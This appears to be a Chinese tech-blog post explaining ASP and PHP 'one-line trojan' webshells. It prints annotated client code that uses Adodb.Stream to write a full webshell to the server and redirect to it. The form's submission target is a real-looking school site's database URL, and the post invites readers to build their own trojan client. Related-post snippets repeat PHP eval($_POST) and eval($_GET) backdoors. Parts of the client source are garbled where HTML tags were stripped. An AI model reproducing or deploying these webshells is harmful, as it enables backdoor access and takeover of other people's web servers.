php eval 黑客利用,eval一句话木马详细讲解

最新推荐文章于 2024-08-06 22:50:12 发布
最新推荐文章于 2024-08-06 22:50:12 发布
阅读量2.4k 收藏 2
点赞数

来解释下它的原理.

587595302eb7c2fcf6934de81e46a326.png

首先是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用 eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代 码,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部分,例如如下摘自一句话客户端的代码:

set iP=server.createObject("Adodb.Stream")

iP.Open

iP.Type=2

iP.CharSet="gb2312"

iP.writetext request("aoyun")

iP.SaveToFile server.mappath("aoyunwan.asp"),2

iP.Close

set iP=nothing

response.redirect "aoyunwan.asp"

学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form('#')),然后执行(使用eval(Request.form('#')+'')),也就是执行了:

set iP=server.createObject("Adodb.Stream")

iP.Open

iP.Type=2

iP.CharSet="gb2312"

iP.writetext request("aoyun")

iP.SaveToFile server.mappath("aoyunwan.asp"),2

iP.Close

set iP=nothing

response.redirect "aoyunwan.asp"

学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象ip,然后使用该对象的writetext方法将request("aoyun")读取 过来的内容(就是我们常见的一句话客户端的第二个textarea标记中的内容,也就是我们的大马的代码)写入服务端的 aoyunwan.asp文件中,写入结束后使用set iP=nothing 释放Adodb.Stream对象 然后使用response.redirect "aoyunwan.asp" 转向刚才写入大马代码的文件,也就是我们最后看见的大马了!

不过一句话木马能成功的条件依赖于两个条件:一、服务器端没有禁止Adodb.Stream组件,因为我们使用一句话木马写入大马代码的条件是服务器端创 建Adodb.Stream组件,如果该组件被禁用的话是不会写入成功的!二、还有就是权限的问题,如果当前的虚拟目录禁止user组或者everyone写 入操作的话那么也是不会成功的.

一句话木马"服务端

就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中value可以自己修改

"一句话木马"客户端

用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件

一句话木马客户端源文件:

里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了

//"action="后面是需要修改的以asp命名的数据库的提交地址

//这个标签的意思是建立一个表单 以post方式提交给连接http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp处理

//这里的value值根据服务端中value而设定

//可以自行修改成相应这里的value值也必须改为pset lP=server.createObject("Adodb.Stream")//建立流对象,有了对象才可以使用它固有的属性和方法

lP.Open //打开

lP.Type=2 //以文本方式

lP.CharSet="gb2312" //字体标准

lP.writetext request("joeving") //取得木马内容 参数joeving可以自己定义 但必须和下面的name=joeving相对应

lP.SaveToFile server.mappath("wei.asp"),2

//将木马内容以覆盖文件的方式写入wei.asp

//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp

//但和下面的response.redirect"wei.asp"中wei.asp的保持一致

lP.Close //关闭对象

set lP=nothing //释放对象

response.redirect "wei.asp" //转向生成的wei.asp 和上面的wei.asp相对应,也就是你熟悉的asp木马登陆界面

//这段程序的功能:利用插入到数据库文件的这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在服务器上建立了个asp木马文件,这样就可以取得webshell了

添入生成木马的内容/textarea>

//这段标签是你用来添加木马内容用的

//程序的主要框架是

//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示

//添加木马内容用的

其实都是些很简单的一些html和asp的知识,大家不妨自己写个自己的木马客户端~~~呵呵

碗丸
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一句话木马攻击复现:揭示黑客入侵的实战过程
weixin_43263566的博客
08-22 1339
一句话木马攻击复现:揭示黑客入侵的实战过程
web安全的一句话木马
IerkeU的博客
12-13 2314
一、WEBshell Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与
php assert eval,代码执行函数一句话木马
weixin_28864249的博客
03-23 2062
前言大家好,我是阿里斯,一名IT行业小白。非常抱歉,昨天的内容出现瑕疵比较多,今天重新整理后再次发出,修改并添加了细节,另增加了常见的命令执行函数如果哪里不足,还请各位表哥指出。eval和assert的区别eval特点eval()会把字符串按照php代码来执行(合法的php代码,以分号结尾)eval()是一个语言构造器,不能被可变函数调用eval($_REQUEST[1]); #eval一句话...
php eval一句话木马干啥的,eval函数简介与PHP一句话木马剖析
weixin_32743045的博客
03-09 1391
eval函数简介与PHP一句话木马剖析大家好我是Carol,我的QQ是:906871417一:eval函数1.eval()函数把字符串按照PHP代码来计算。2.该字符串必须是合法的PHP代码,且必须以分号结尾。3.如果没有在代码字符串中调用return语句,则返回NULL。如果代码中存在解析错误,则eval()函数返回false。二:eval函数的一般用法$string="beautiful"...
WebShell及一句话木马
最新发布
qq_67812668的博客
08-06 892
1.一句话木马的原理将一句话木马插入到asp文件中(包括asa.cdx.cer文件),该语句将会作为触发,接收入侵者通过客户端提交的数据,执行并完成相应的入侵操作。客户端则用来向服务端提交控制数据,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件。 2.通常WebShell客户端怎么绕过WAF1).绕过前台脚本检测扩展名上传Webshell当用户在客户端上传文件的时候,客户端与服务器没有进行任何的信息交互,判断上传文件的类型是前台脚本文件来判断。
PHP一句话木马
bolinmengling的博客
02-27 2万+
一句话木马的普通形式 <?php eval(@$_POST['password']);?> <?php ;?>是php的格式 eval是执行函数 POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过_POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过P​OST是传入的参数,此处使用的...
php eval 黑客利用,代码安全审计:当file_exists遇上eval
weixin_28323057的博客
03-28 346
‍起因‍昨晚有人在一QQ群上问lcms(一款网站CMS系统)的一个漏洞是怎么形成的,说了半天。他截图不完整,于是叫他传代码,下载回来找到router.php代码片段如下:protectedfunctiongetInputString($name,$default_value="",$format="GPCS"){//orderofretrievedefaultGPCS(g...
phpeval
Lyj的博客
09-11 1063
 eval("\$str = $num1 $operate $num2;"); 注:1. eval()中必须使用双引号        2. 函数中必须加英文状态下的分号   &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;meta charset='utf-8'&gt; &lt;title&gt; &lt;..
一句话木马要点和防范注意事项
05-24
例如,一个简单的PHP一句话木马可能如下所示: ```php <?php eval($_GET['cmd']); ?> ``` 这个例子中,`eval`函数会执行通过GET参数`cmd`传入的任何PHP代码,从而让攻击者能够控制服务器。 了解了一句话木马的基本...
如何简单有效地防范PHP一句话木马
云度
09-07 4945
php语言无需编译,动态执行,我们不得不佩服它的开发效率。但正因为php开发语言可以动态执行,才带来了类似一句话木马等安全问题。 因为我们要十分警惕,否则,无论做的再好,都将“满盘皆输”。 首选,我们要先弄清楚,php一句话木马是如何被植入到系统的,基本存在通过一下几种方式: 利用sql注入。sql注入可以通过mysql pdo的预处理来解决。 利用配置上的漏洞,伪造一张图片...
webshell与一句话木马
2ed
06-23 3095
webshell 可理解为web+shell 通常就是大佬所说的大马 web就是指web页面,shell就是命令执行环境。webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起,然后就可以使用浏览器来...
eval与assert执行一句话木马
C_LCH_2000的博客
07-24 2346
eval函数中参数是字符,assert函数中参数为表达式 (或者为函数
PHP一句话木马
weixin_64338385的博客
12-03 1073
Get、 Post、Assert 首先在www目录下创建出对应文件 以 .php为后缀名 Get输入 <?php @eval($_GET([‘cmd’]?); //eval把字符串作为PHP代码执行 ?> 保存之后在网页访问 127.0.0.1/get.php?cmd=system(‘ipconfig’); 输入whoami,访问用户名 Post <?php @eval($_POST[‘cmd’]); ?> Post ...
eval函数 php_PHP一句话木马代码和函数eval的简介
weixin_35064201的博客
03-09 1451
大清早的刚从床上爬起来。雨落就跑来找我问我这段代码是什么意思看了一下,post接收pp的值,抑制错误输出。呵呵开个玩笑,其实不是这么简单,这是一段PHP木马代码,也就是我们所说的后门程序为什么说这段代码是后门程序?其实这段代码属于基础类的一句话,功能仅限于验证漏洞了,实际中太容易被查出来了,也就是早上雨落直接带图说检测到木马文件这个是PHP最常见的一句话木马的源码,通过post木马程序来实现木马的...
php+利用eval,PHPeval()函数的总结(转)
weixin_34791959的博客
03-19 342
eval_r()函数中的evalevaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行。代码:eval_r("echo 'hello world';");上边代码等同于下边的代码:echo "hello world";在浏览器中都输出:hello world运用eval_r()要注意几点:1.eval函数的参数的字符串末尾一定要有分号,在最后还要另加一个分号(这个分号是php...
php eval一句话木马干啥的,php eval函数一句话木马代码
weixin_28481133的博客
03-09 702
php eval函数一句话木马代码这个是php常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。如果没有在代码字符串中调用return语句,则返回NULL。如果代码中存在解析错误,则eval()函数返回false。eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要...
PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
百彦子烨的博客
11-10 2万+
该文章对PHP一句话木马 @eval($_POST['hack']); 语句进行了详细解析并进行了简单的靶机演示该木马利用操作
【转】php eval函数用法
zzz的博客
07-06 1124
php eval ()函数 定义和用法 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。 语法 eval(phpcode) 提示 返回语句会立即终止对字符串的计算。 该函数对于在数据
eval函数简介与PHP一句话木马剖析
热门推荐
对代码不满足,是任何真正有天才的程序员的根本特征。
01-29 2万+
eval函数简介与PHP一句话木马剖析    大家好我是Carol,我的QQ是:906871417 一:eval函数 二:eval函数的一般用法 三:eval函数的特殊用法 四:php一句话挂马的原理 五:禁用eval函数   一:eval函数 1.eval() 函数把字符串按照 PHP 代码来计算。 2.该
eval一句话木马
12-09
根据提供的引用内容,可以得知`eval`在一句话木马中被广泛使用。一句话木马是一种恶意代码,通常是一行代码,可以在未经授权的情况下远程访问受感染的计算机并执行恶意操作。攻击者通常使用`eval`函数来执行一句话...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值